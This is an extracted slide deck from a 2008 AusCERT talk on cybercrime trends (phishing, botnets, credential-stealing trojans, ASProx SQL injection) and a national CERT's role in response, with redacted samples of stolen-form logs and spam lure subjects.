pac inet2008 online threats and trends and roleof a cert kathryn kerr

1

Online threats and trendsand the role of a CERT

PacINET 2008Kathryn Kerr, AusCERT

Copyright © 2008 AusCERT 1

Outline

• Introduction• Online threats and trends

– What’s at risk– Attacks trends

• What does AusCERT do?– Role of the national CERT

• Ideas for building capability


Copyright © 2008 AusCERT

What’s at risk? Confidentiality Health records via the web

• At risk – integrity and confidentiality• For example, NSW government Health-e-link

– http://www.healthelink.nsw.gov.au/additional_resources/?a=53559#7

• Single factor authentication over web based SSL• Adheres to privacy principles and has measures to

protect the security of the Health-e-link servers and database

• But none of these counter-measures protects against commonplace attacks directed at client PCs – which may capture online transactions, including form data

sent or received via SSL sessions


What’s at risk? Availability

• Access to your country’s online systems and services• Example - Estonia is a small country but highly dependent on its

online systems– 100% use e-government– 99% use online banking– 86% online taxes

• Estonian DDOS attacks lasted for 3 weeks (May 2007)?– targeted government and commercial systems– Attacks politically motivated but with financial and social impacts

• CERT- Estonia played a significant role coordinating response to defend and mitigate these attacks

– Sought assistance from experts around the world (including ISPs, CERT communities, network and infosec communities)?

– Developing lessons-learned reports

Copyright © 2008 AusCERT 5 Copyright © 2008 AusCERT

The threat and motivation• Since 2003 – cybercrime economy started with

phishing• Criminals are actively targeting e-commerce and e-

government services• Motivation is money – illicit financial gain• Many types of cybercrime

• identity theft features prominently

• Returns are high – risk is low• Common attacks directed at:

• Client PCs (home and work)?• Web applications/servers

2

Evolution of the threat

• Botnets are the criminals’ “killer app” (swiss army knife)?– Hosting malware sites– Hosting phishing sites– Advertisement click fraud– Sending out spam– For rent/sale– DDOS attacks

• Fast flux domains (using fraudulently registered domains)?• Complex and resilient communication structures• Self defending, eg Storm P2P botnet


Fast Flux domains


Sophisticated malware functionality• Ability to defeat various forms of two factor authentication

– Ability to initiate transactions in the background after legitimate user has authenticated during the authenticated session.

• Ability to defeat SSL digital certificates by using HTML injection and retaining connection to legitimate site with legitimate digital certificate

• Ability to modify browser stored root certificates• Ability to access all information on the computer including

protected store data (passwords), including soft certificates an d protected store

• Ability to hide itself (rootkits) and disable or by pass security counter-measures

• Ability of attacker to control hundreds of thousands of computers simultaneously, via the malware

Copyright © 2008 AusCERT 9 Copyright © 2007 AusCERT10

Trojans


Logging behaviour

Tsunami Trojan: infections and logging

0

2000

4000

6000

8000

10000

12000

19/1

1/20

04

24/1

1/20

04

29/1

1/20

04

04/1

2/20

04

09/1

2/20

04

14/1

2/20

04

19/1

2/20

04

Date / time

Lo

gg

ing

sit

e h

its

Data logged Trojan infections

3


Captured credentials and web sessions

SPAM

Clicks on the

link“Your order #[number] has been accepted for the amount 865.00 AUD”“Act of terrorism at The Opening Ceremony of the ATHENS 2004 Olym pic Games”"Current Australia's Prime Minister survived a near attack"“Osama Found Hanged”“George Bush sniper-rifle shot! ”“Huge ocean wave! ” - http://www.tsunamidanger.com“I sent Sent You an E-Card From AOL E-Cards powered by BlueMountainCards.com.au”“SENSATION! It's happened again! White house orgie! ”

Visitslegitimate

Website withusername &

password

E-government security challenges

• Security of e-government transactions depends on the security of the entire channel

– Channel includes the remote client PCs that connect to those systems– For all personal information accessed or submitted online

• In event of remote system compromise, technology exists to protect integrity of financial transactions (eg, online banking)?

– Eg transaction signing off untrusted device

• For compromised remote client systems there is no way to protect the confidentiality of those transactions.

– For e-government services confidentiality is paramount security goal

• Assume remote client PC is compromised when developing your risk management strategy


15

ID theft malware 1

https://online.NatLloyds.co.uk/logon.ibc

14/12/2004 14:24:16

form=theform;type=text; UserId1=xxxxxxxx

form=theform;type=password; Password=txxxxxxxxle

URL=https://online.NatLloyds.co.uk/logon.ibc

To log on enter your User ID and Password.

………...

Please enter characters 1, 2 and 6 from your Memorable Information

1 a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9



Forgotten your Memorable Information?

<!>https://online.NatLloyds.co.uk/logon.ibc

14/12/2004 14:24:27

form=theForm;type=select-one; ResponseValue0=g

form=theForm;type=select-one; ResponseValue1=a

form=theForm;type=select-one; ResponseValue2=r

16

ID theft malware 3

URL=https://www.ir_online.gov.uk/irsa2/RenderEngine?eForms_timestamp=1104501920101This site is compatible with assistive technology. Skip to the top menu including help, save and

close. Skip to the menu on the left. Skip to the first paragraph or entry box on this page.Online Tax Return - Self Assessment

Mr XXXX XXXXXXXX Tax Return: 2003/2004

Main Form (SA100)?Welcome

My DetailsForm(s) SelectionEmploymentSelf-employmentPartnershipLand & PropertyMain Form

17

ID theft malware 4

Message 14 of 2898From:XXXXXXXTo:XXXXXXSubject:RE: VPN ConnectionsSent Date:XXXXXXXReceived Date:XXXXXXX

No Problem XXXXX. If you do have any troubles please don't hesitate to call.

Best wishes,

XXX-----Original Message-----From:XXXXX Sent: XXXXTo: XXXXSubject: Re: VPN Connections

XXX,after having no luck for some days - I've just got through..... Sorry for wasting your time,XXXX

18

ID theft malware 5

Mail | Directory | Return To Portal | Preferences | Logout | HelpCopyright © 1998, 2004, XXXXX. All rights reserved.[1]<>https://www.XXXX.com/frame=1 form=Logon i_1=XXXXXXX[pwd] frame=1 form=Logon i_2=XXXXXURL=https://www.XXXX.com/ Employee GuideXXX HomepageXXXXX OpportunitiesXXXCarXXXUserCareer ManagementInternal TrainingWelcome to your personal view and data on XXXX's HR database. Logon here to view your Select Flexible Benefits system or access your Personal Documents. [1]< >https://www.xxxx.com/12/31/2004 11:29:41 AMframe=1 form=Logon i_1=xxxxxx[pwd] frame=1 form=Logon i_2=xxxxxxxxx

4


Web app vulnerabilties

• Many cyber attacks are hosted on compromised web sites

• Use a variety of attack mechanisms to compromise web site and serve malware to visitors to the site

• No need for spam to direct visitors to the site• Rather than scanning, specific vulnerabilities are

searched for (eg using Google) then exploited– Attacks often automated – bulk compromises

Overt web defacement - before


Copyright © 2007 AusCERT21

Now – covert compromise Now


Locating vulnerable web pages


SQL injection using ASProx malware• Active Server Pages (ASP) is Microsoft ’s implementation

of server-side scripting• ASProx conducts automated Google searches for .asp

web pages and launches SQL injection attacks• If successful, includes a malicious script tags which

attempts to install malware• AusCERT is monitoring .au domains compromised by

ASProx• Between 24 June 2008 – 17 July 2008, 98 .au domains

compromised• Purpose to create bots


5

ASProx SQL injection

Copyright © 2008 AusCERT 25 Copyright © 2008 AusCERT

About AusCERT

• Australia’s national CERT– Constituency - all Australian Internet users– 15 years of operation

• Independent and impartial– University-based, non-government– Self-funded and not-for-profit

• Primary point of contact for incidents affecting Australian networks– Analysis and advice about computer network threats and

vulnerabilities– Incident response, coordination and mitigation

What is AusCERT doing?

– Monitoring and providing advice about threats and vulnerabilities and security management

– Incident response and mitigation assistance for current attacks

– Analysing malware to understand the nature of the threat and how to prevent and recover from the attack

– Build and maintain links with national and international stakeholders vital for effective incident response.

Copyright © 2008 AusCERT2 7

Attack detection and mitigation

• Detecting and providing advice about , eg– vulnerable DNS servers– vulnerable web servers– ASProx web compromises– compromised PII and credentials (log data)?

• Compromised PII and credentials:– Sort and separate by domain– Then redistribute to affected parties in Australia and around

the world


What are the solutions?

• National e -security plans and arrangements, which include:– National or regional CERT capability– Capability for monitoring, analysing and reporting on cyber

threats and vulnerabilities– Plans for dealing with DDOS attacks against critical online

systems/services– Best practice domain name registry policies– Adherence to effective Acceptable Use Policies by ISPs– Education and awareness raising program for government,

business and end-users and incentives for applying good security

– Recognise risks to e-government systems - channelCopyright © 2008 AusCERT 29

What are the solutions?

• Internationally– Coordinated and cohesive cyber response capabilities

• Among like sectors, law enforcement, CERTs, domain name registries, ISPs, ICT regulators, anti-virus vendors, product vendors

– Current priorities require focus on:• Detecting and cleaning bots/botnets• Secure web programming to prevent legitimate sites being

used to serve malware• Malware detection and analysis • Procedures to prevent and remove fraudulent domains• Building trusted (trustworthy) (more secure) software

6

31

Domain registries

Domain Registries

Model for national and international cooperation

Finance Sector

Finance Sector

Law Enforcement

Law Enforcement

National CERT

National CERT

FS

LE CERT

FS

ISP

ISPs

Further information

• E-government risks• Managing risk associated with online ID theft for government

and providers of e-government services, 2005, www.auscert.org.au

• Cybercrime and malware– OECD, Malicious software (malware) – a security threat to the

internet economy, Ministerial Background Report, June 2008, available online

– House of Lords, Personal Internet Security, Science and Technology Committee Report, Volume 1, 2007, available online

– CERT/CC, Botnets as a vehicle for online crime, 2005, http://www.cert.org/archive/pdf/Botnets.pdf


Thank you.

Questions?

[email protected]


pac inet2008 online threats and trends and roleof a cert kathryn kerr

News & Politics